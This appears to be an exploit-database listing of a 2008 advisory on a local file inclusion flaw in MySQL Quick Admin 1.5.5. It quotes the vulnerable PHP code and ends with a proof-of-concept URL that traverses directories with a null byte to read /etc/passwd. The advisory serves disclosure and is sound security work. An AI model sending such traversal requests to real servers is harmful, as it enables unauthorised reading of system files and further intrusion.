[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MySQL Quick Admin 1.5.5 Local File Inclusion Vulnerability

Author
Vinod Sharma
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4095
Category
web applications
Date add
06-11-2008
Platform
unsorted
==========================================================
MySQL Quick Admin 1.5.5 Local File Inclusion Vulnerability
==========================================================


##################################################################################
#										 #		
#		Author:	Vinod Sharma						 #
#		Date:	05th Nov, 2008						 #
#		Note: 	This information is only for educational purpose, author # 
#			will not bear responsibility for any damages. 		 #
##################################################################################


#########################################################################################
#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 				#
#allows remote attackers to read and execute arbitrary files via a .. (dot dot) 	#
#in the lang parameter to actions.php.							#
#											#
#											#
#											#
#Appplication still unpatched								#
#											#
#vulnerable code in actions.php								#
# 											#				
#/* code start										#
#    case 27:										#
#         $do = $_GET['do'];								#
#         if($do == "theme" && file_exists("themes/".$_GET['theme'])){			#
#             setcookie('theme', $_GET['theme'], time()+60*60*24*30);			#
#             $_SESSION['theme'] = $_GET['theme'];					#
#             unset($_SESSION['theme_name']);						#
#         } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){		#
#             setcookie('language', $_GET['lang'], time()+60*60*24*30);			#
#             $_SESSION['language'] = $_GET['lang'];					#
#             unset($_SESSION['lang_name']);						#
#         }										#
#         header("Location: main.php");							#
#											#
#/* code end										#
#											#	
#$_SESSION['language'] is set to the value of the lang parameter without any 		#
#sanitization.										#
#											#
#The actions.php will send this $_SESSION['language'] value to required.php which will 	#
#pass it to include() function without any sanitization. 				#
#											#
#											#
#vulnerable code in required.php							#
#											#
#/* code start 										#
#											#
#line 22 in required.php:  include("lang/".$_SESSION['language']."/lang.php");		#			
#											#
#/* code end										#
#########################################################################################


POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00


#########################################################################################



#  0day.today [2024-12-24]  #